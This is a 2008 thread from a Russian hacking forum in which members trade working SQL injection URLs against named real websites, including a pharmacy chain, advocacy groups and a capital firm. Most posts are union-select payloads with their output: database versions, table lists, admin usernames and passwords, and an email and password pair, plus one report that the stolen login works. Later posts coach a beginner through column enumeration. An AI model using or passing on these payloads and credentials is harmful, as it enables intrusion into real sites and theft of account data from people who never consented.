HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.03.2008, 22:11
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
По умолчанию

Только учусь!
Сеть аптечных магазинов!
Цитата:
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576
5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
админка
Цитата:
http://zdorovie-plus.com/adm/login.php
------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

Последний раз редактировалось samarin; 22.03.2008 в 22:46..
 
Ответить с цитированием

  #2  
Старый 23.03.2008, 00:27
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
По умолчанию

Цитата:
Сообщение от samarin  
Только учусь!
Сеть аптечных магазинов!

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

админка

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zd p_usr/*
user: *****
pass: *****
+ заходит.
 
Ответить с цитированием

  #3  
Старый 23.03.2008, 00:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Muhacir
тебе делать нечего? человек написал:
"прошу на обсуждение в вопросы по уязвимостям"
Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали
 
Ответить с цитированием

  #4  
Старый 23.03.2008, 01:40
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
По умолчанию

Код:
http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Members+limit+0,1/*
digitalindependence@riseup.net:shawn

Код:
http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_users/*
Andy:‰ ÿ@b宽I™Þ_ˆý о_О какой то странный пароль

Код:
http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/*
4.1.19-standard-log:ukmoths:ukmoths@server213-171-218-204.livedns.org.uk
 
Ответить с цитированием

  #5  
Старый 23.03.2008, 13:40
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
По умолчанию

http://www.ococtexas.org/
Код:
http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/*
Код:
5.0.45-community-nt:ococ@localhost:ococ
Код:
http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLES%20--
Цитата:
• CHARACTER_SETS
• COLLATIONS
• COLLATION_CHARACTER_SET_APPLICABILITY
• COLUMNS
• COLUMN_PRIVILEGES
• KEY_COLUMN_USAGE
• PROFILING
• ROUTINES
• SCHEMATA
• SCHEMA_PRIVILEGES
• STATISTICS
• TABLES
• TABLE_CONSTRAINTS
• TABLE_PRIVILEGES
• TRIGGERS
• USER_PRIVILEGES
• VIEWS
• age
• call_track
• contract_time
• cp_user
• family
• group
• hear_from
• kids
• language
• message
• news
• race
• reason
• static_page
• status

http://www.ztocapital.com/
Код:
http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*
5.0.45-community-nt:zto@localhost:zto
 
Ответить с цитированием

  #6  
Старый 23.03.2008, 15:40
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


По умолчанию

Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать...
 
Ответить с цитированием

  #7  
Старый 23.03.2008, 15:42
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


По умолчанию

mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
 
Ответить с цитированием

  #8  
Старый 23.03.2008, 15:49
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


По умолчанию

Цитата:
Сообщение от Piflit  
mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"
 
Ответить с цитированием

  #9  
Старый 23.03.2008, 15:52
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

ковычка не нужна
 
Ответить с цитированием

  #10  
Старый 23.03.2008, 15:56
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


По умолчанию

Цитата:
Сообщение от Spaise  
ковычка не нужна
ага, убрал ее! но что то никак не выходит, перебираю 1,2,3.. и т.д. php выдаёт "The used SELECT statements have a different number of columns"
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.